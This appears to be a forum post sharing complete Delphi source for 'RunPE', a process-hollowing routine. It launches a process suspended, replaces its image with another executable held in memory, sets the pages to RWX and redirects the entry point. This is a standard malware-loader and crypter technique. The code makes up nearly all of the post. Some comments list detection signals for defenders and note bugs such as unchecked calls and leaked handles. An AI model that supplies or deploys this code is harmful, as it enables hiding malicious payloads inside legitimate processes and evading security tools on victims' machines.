  [Delphi] Memory Execution RunPe
#1
Using:

Code:
program RunPE;

uses
 Windows,
 uRunPE in 'uRunPE.pas';

var
 bBuff:  TByteArray;

{$R *.res}

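function FileToBytes(sPath:string; var bFile:TByteArray):Boolean;
{ Reads the whole file at sPath into bFile.
  Returns TRUE only when the file could be opened, its size determined and
  exactly that many bytes read; an empty file yields TRUE with a zero-length
  bFile.  On FALSE, bFile is left empty so callers never see a partial read. }
var
 hFile:  THandle;
 dSize:  DWORD;
 dRead:  DWORD;
begin
 Result := FALSE;
 SetLength(bFile, 0);
 hFile := CreateFile(PChar(sPath), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0);
 if hFile = INVALID_HANDLE_VALUE then
   Exit;
 try
   dSize := GetFileSize(hFile, nil);
   { GetFileSize signals failure (and a low DWORD of $FFFFFFFF) with INVALID_FILE_SIZE }
   if dSize = INVALID_FILE_SIZE then
     Exit;
   SetLength(bFile, dSize);
   if dSize = 0 then
   begin
     { Nothing to read; bFile[0] on an empty dynamic array would be a range error. }
     Result := TRUE;
     Exit;
   end;
   dRead := 0;   { ReadFile may fail without touching dRead }
   if ReadFile(hFile, bFile[0], dSize, dRead, nil) and (dRead = dSize) then
     Result := TRUE
   else
     SetLength(bFile, 0);
 finally
   { Runs on every exit path, including an exception raised by SetLength. }
   CloseHandle(hFile);
 end;
end;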

begin
 { Program entry: load calc.exe from the working directory and hand it to
   RunExe together with this executable's own path (ParamStr(0)). }
 if not FileToBytes('calc.exe', bBuff) then
   Exit;
 RunExe(ParamStr(0), bBuff);
end.


Code:

Code:
UNIT
unit uRunPE;

interface

uses Windows;

type
 TByteArray = array of Byte;

function RunEXE(sVictim:string; bFile:TByteArray):Boolean;
function NtUnmapViewOfSection(ProcessHandle: THandle; BaseAddress: Pointer): DWORD; stdcall; external 'ntdll.dll';

implementation

{ Byte copy of dLength bytes from Source to Destination via CopyMemory.
  NOTE: this deliberately shadows System.Move inside this unit and takes
  its arguments as (Destination, Source), the opposite order of
  System.Move(Source, Dest, Count) - every call in this unit relies on that. }
procedure Move(Destination, Source: Pointer; dLength:Cardinal);
begin
 Windows.CopyMemory(Destination, Source, dLength);
end;

{ Process hollowing ("RunPE"): starts sVictim suspended, replaces its mapped
  image with the in-memory PE held in bFile, points the initial thread at the
  new entry point and resumes it.
  32-bit only: it reads/writes the Ebx/Eax context registers, copies a
  248-byte IMAGE_NT_HEADERS32 and writes 4-byte pointers.
  Returns TRUE once ResumeThread has been issued - not that the image ran:
  no return value of any Win32 call below is checked.
  For defenders: CreateProcess(CREATE_SUSPENDED) -> NtUnmapViewOfSection ->
  VirtualAllocEx/WriteProcessMemory -> SetThreadContext -> ResumeThread
  against another process is the canonical hollowing sequence and is the
  behaviour that EDR / API-telemetry detections key on. }
function RunEXE(sVictim:string; bFile:TByteArray):Boolean;
var
 IDH:        TImageDosHeader;      // DOS header copied out of bFile
 INH:        TImageNtHeaders;      // NT headers copied out of bFile
 ISH:        TImageSectionHeader;  // one section header at a time
 PI:         TProcessInformation;  // handles of the suspended victim
 SI:         TStartUpInfo;
 CONT:       TContext;             // initial-thread context of the victim
 ImageBase:  Pointer;              // base returned by VirtualAllocEx in the victim
 Ret:        DWORD;                // bytes-transferred out-param, never inspected
 i:          integer;
 Addr:       DWORD;                // value read from the victim, later reused as OldProtect
 dOffset:    DWORD;                // file offset of the first section header
begin
 Result := FALSE;
 try
   // 64 = SizeOf(TImageDosHeader); no check that bFile is that long.
   Move(@IDH, @bFile[0], 64);
   if IDH.e_magic = IMAGE_DOS_SIGNATURE then
   begin
     // 248 = SizeOf(IMAGE_NT_HEADERS32); _lfanew is not range-checked against bFile.
     Move(@INH, @bFile[IDH._lfanew], 248);
     if INH.Signature = IMAGE_NT_SIGNATURE then
     begin
       FillChar(SI, SizeOf(TStartupInfo),#0);
       FillChar(PI, SizeOf(TProcessInformation),#0);
       SI.cb := SizeOf(TStartupInfo);
       // Victim is created suspended so its initial thread can be redirected before it runs.
       if CreateProcess(nil, PChar(sVictim), nil, nil, FALSE, CREATE_SUSPENDED, nil, nil, SI, PI) then
       begin
         CONT.ContextFlags := CONTEXT_FULL;
         if GetThreadContext(PI.hThread, CONT) then
         begin
           // On x86 the suspended initial thread's Ebx holds the PEB; +8 is its ImageBaseAddress.
           ReadProcessMemory(PI.hProcess, Ptr(CONT.Ebx + 8), @Addr, 4, Ret);
           // Unmap request against the victim; the base argument passed here is @Addr.
           NtUnmapViewOfSection(PI.hProcess, @Addr);
           // Reserve+commit SizeOfImage at the payload's preferred base, initially RW.
           ImageBase := VirtualAllocEx(PI.hProcess, Ptr(INH.OptionalHeader.ImageBase), INH.OptionalHeader.SizeOfImage, MEM_RESERVE or MEM_COMMIT, PAGE_READWRITE);
           WriteProcessMemory(PI.hProcess, ImageBase, @bFile[0], INH.OptionalHeader.SizeOfHeaders, Ret);
           dOffset := IDH._lfanew + 248;
           // 40 = SizeOf(TImageSectionHeader); each section's raw data is copied to its RVA
           // and the whole range is then made RWX - a memory-permission pattern worth alerting on.
           for i := 0 to INH.FileHeader.NumberOfSections - 1 do
           begin
             Move(@ISH, @bFile[dOffset + (i * 40)], 40);
             WriteProcessMemory(PI.hProcess, Ptr(Cardinal(ImageBase) + ISH.VirtualAddress), @bFile[ISH.PointerToRawData], ISH.SizeOfRawData, Ret);
             VirtualProtectEx(PI.hProcess, Ptr(Cardinal(ImageBase) + ISH.VirtualAddress), ISH.Misc.VirtualSize, PAGE_EXECUTE_READWRITE, @Addr);
           end;
           // Write the new base back into the PEB and aim the thread at the payload's entry point.
           WriteProcessMemory(PI.hProcess, Ptr(CONT.Ebx + 8), @ImageBase, 4, Ret);
           CONT.Eax := Cardinal(ImageBase) + INH.OptionalHeader.AddressOfEntryPoint;
           SetThreadContext(PI.hThread, CONT);
           ResumeThread(PI.hThread);
           // Success path never closes PI.hProcess / PI.hThread: both handles leak.
           Result := TRUE;
         end;
       end;
     end;
   end;
 except
   // Reached only on an exception; PI is still uninitialised if it fires before the
   // FillChar above, so these CloseHandle calls may receive garbage values.
   CloseHandle(PI.hProcess);
   CloseHandle(PI.hThread);
 end;
end;

end.

